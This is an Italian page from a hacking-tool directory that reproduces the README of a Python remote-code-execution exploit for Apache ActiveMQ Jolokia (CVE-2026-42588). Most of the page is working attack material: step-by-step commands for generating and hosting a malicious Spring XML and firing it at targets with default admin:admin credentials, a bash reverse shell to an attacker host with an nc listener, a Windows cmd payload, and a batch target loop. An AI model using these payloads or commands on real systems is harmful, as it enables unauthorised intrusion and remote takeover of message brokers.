Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-42588 — Exploit RCE basato su Python per CVE-2026-42588 che mira ad Apache ActiveMQ Jolokia. Include modalità solo verifica, generazione di XML dannoso e supporto per reverse shell, OOB e verifica basata su file. | Kitploit
Strumenti/GitHubGitHub/hnytgl/cve-2026-42588
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubhnytgl/cve-2026-42588

CVE-2026-42588

Exploit RCE basato su Python per CVE-2026-42588 che mira ad Apache ActiveMQ Jolokia. Include modalità solo verifica, generazione di XML dannoso e supporto per reverse shell, OOB e verifica basata su file.

Vedi Repository
373 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-42588 - Sfruttamento di Esecuzione di Codice Remoto in Apache ActiveMQ Jolokia

Gravità: 🔴 Alta (CVSS 4.0: 8.1)
Tipo di vulnerabilità: CWE-94 — Iniezione di codice
Versioni interessate: Apache ActiveMQ < 5.19.7 / 6.0.0 ≤ versione < 6.2.6
Prerequisito di sfruttamento: Credenziali di autenticazione per Web Console (predefinito admin:admin)


📋 Indice

  • Panoramica della vulnerabilità
  • Principio della vulnerabilità
  • Versioni interessate
  • Condizioni di sfruttamento
  • Descrizione dei file
  • Avvio rapido
  • Utilizzo dettagliato
  • Panoramica della catena di sfruttamento
  • Verifica del successo dello sfruttamento
  • Soluzioni di correzione
  • Misure di mitigazione temporanee
  • FAQ
  • Disclaimer
  • Link di riferimento

Panoramica della vulnerabilità

CVE-2026-42588 è una vulnerabilità di Esecuzione di Codice Remoto (RCE) post-autenticazione presente in Apache ActiveMQ.

Un attaccante, in possesso delle credenziali di autenticazione per la Web Console, può sfruttare l'interfaccia bridge Jolokia JMX-HTTP (/api/jolokia/) per invocare il metodo BrokerService.addNetworkConnector(String), passando un URI masterslave:// appositamente costruito. Utilizzando il protocollo xbean:, carica un file di configurazione Spring XML remoto, eseguendo infine comandi arbitrari di sistema nella JVM del broker ActiveMQ.


Principio della vulnerabilità

Catena di sfruttamento

/api/jolokia/ (Bridge Jolokia JMX-HTTP)
       │
       ▼
BrokerService.addNetworkConnector(String)
       │
       ▼
masterslave://?brokerConfig=xbean:http://attaccante/malicious.xml
       │
       ▼
XBeanBrokerFactory → ResourceXmlApplicationContext
       │
       ▼
Spring istanzia preventivamente tutti i bean singleton → Attiva Runtime.exec() / ProcessBuilder
       │
       ▼
🚨 Esecuzione di Codice Remoto (RCE)

Punti tecnici chiave

FaseDescrizione
Superficie esposta di JolokiaLa Web Console di ActiveMQ espone di default /api/jolokia/, consentendo l'esecuzione dell'operazione exec sui MBean org.apache.activemq:*
Metodo pericolosoBrokerService.addNetworkConnector(String) riceve un URI di discovery e lo analizza
Catena URIIl parametro brokerConfig del protocollo masterslave:// è controllabile e, insieme allo schema xbean:, attiva il caricamento del contesto Spring
Punto di attivazione RCEXBeanBrokerFactory utilizza ResourceXmlApplicationContext per caricare XML remoto; Spring istanzia tutti i bean singleton prima della validazione della configurazione

Versioni interessate

Intervallo di versioneStato
Apache ActiveMQ < 5.19.7❌ Vulnerabile
6.0.0 ≤ Apache ActiveMQ < 6.2.6❌ Vulnerabile
Apache ActiveMQ ≥ 5.19.7✅ Corretto
Apache ActiveMQ ≥ 6.2.6✅ Corretto

Condizioni di sfruttamento

  1. ✅ Raggiungibilità di rete — L'interfaccia /api/jolokia/ deve essere accessibile all'attaccante (porta predefinita 8161)
  2. ✅ Credenziali valide — Possesso delle credenziali di autenticazione per la Web Console di ActiveMQ (predefinito admin:admin)
  3. ✅ Server HTTP dell'attaccante — Necessario un server HTTP raggiungibile dal target per ospitare il file XML malevolo

Descrizione dei file

.
├── CVE-2026-42588_EXP.py   # Script di sfruttamento della vulnerabilità (core)
├── malicious.xml            # Template XML Spring malevolo
├── requirements.txt         # Dipendenze Python
└── README.md                # Questo file
FileUtilizzo
CVE-2026-42588_EXP.pyScript di sfruttamento Python, supporta modalità di rilevamento (--check-only) e generazione XML (--gen-xml)
malicious.xmlTemplate di configurazione XML Spring malevolo, include due modalità di sfruttamento: Runtime.exec() e ProcessBuilder

Avvio rapido

1. Installare le dipendenze

pip install -r requirements.txt

2. Generare il file XML malevolo

python CVE-2026-42588_EXP.py --gen-xml -c "touch /tmp/activemq_pwned" > malicious.xml

3. Ospitare il file XML malevolo

Avviare un server HTTP sulla macchina attaccante:

python3 -m http.server 8080

4. Eseguire lo sfruttamento

# Utilizzo credenziali predefinite admin/admin
python CVE-2026-42588_EXP.py \
    -u http://192.168.1.100:8161 \
    -x http://tuo-indirizzo-attaccante:8080/malicious.xml

# Utilizzo credenziali personalizzate
python CVE-2026-42588_EXP.py \
    -u http://target:8161 \
    -U mioutente \
    -P miapassword \
    -x http://tuo-indirizzo-attaccante:8080/malicious.xml

5. (Opzionale) Solo rilevamento vulnerabilità

python CVE-2026-42588_EXP.py -u http://192.168.1.100:8161 --check-only

Utilizzo dettagliato

Parametri da riga di comando

usage: CVE-2026-42588_EXP.py [-h] [-u URL] [-U USERNAME] [-P PASSWORD]
                             [-x XML_URL] [--check-only] [--gen-xml]
                             [-c COMMAND] [--timeout TIMEOUT] [--no-verify]

Opzioni:
  -u, --url         URL del target ActiveMQ (es. http://192.168.1.100:8161)
  -U, --username    Nome utente Web Console (predefinito: admin)
  -P, --password    Password Web Console (predefinito: admin)
  -x, --xml-url     URL remoto del file XML Spring malevolo
  --check-only      Solo rilevamento accessibilità interfaccia Jolokia
  --gen-xml         Genera file XML malevolo e lo invia su stdout
  -c, --command     Comando da eseguire sul target (predefinito: touch /tmp/activemq_pwned)
  --timeout         Timeout richiesta HTTP in secondi (predefinito: 30)
  --no-verify       Disabilita verifica del certificato SSL

Scenario 1: Reverse Shell

1. Generare il file XML malevolo sulla macchina attaccante:

python CVE-2026-42588_EXP.py --gen-xml \
    -c "/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'" \
    > reverse_shell.xml

2. Ospitare il XML e avviare l'ascolto:

# Terminale 1: Server HTTP
python3 -m http.server 8080

# Terminale 2: Ascolto nc
nc -lvnp 4444

3. Attivare la vulnerabilità:

python CVE-2026-42588_EXP.py \
    -u http://target:8161 \
    -x http://10.0.0.1:8080/reverse_shell.xml

Scenario 2: Esecuzione comando CMD (target Windows)

1. Generare file XML malevolo per Windows:

Modificare il comando ProcessBuilder in malicious.xml in:

<bean class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
        <list>
            <value>cmd.exe</value>
            <value>/c</value>
            <value>whoami &gt; C:\windows\temp\pwned.txt</value>
        </list>
    </constructor-arg>
</bean>

2. Ospitare ed eseguire:

python CVE-2026-42588_EXP.py \
    -u http://windows-target:8161 \
    -x http://attaccante:8080/malicious_win.xml

Scenario 3: Solo rilevamento vulnerabilità

# Rilevamento batch
for ip in $(cat targets.txt); do
    echo "=== Test $ip ==="
    python CVE-2026-42588_EXP.py -u "http://$ip:8161" --check-only --timeout 5
done

Panoramica della catena di sfruttamento

Scarica lo strumento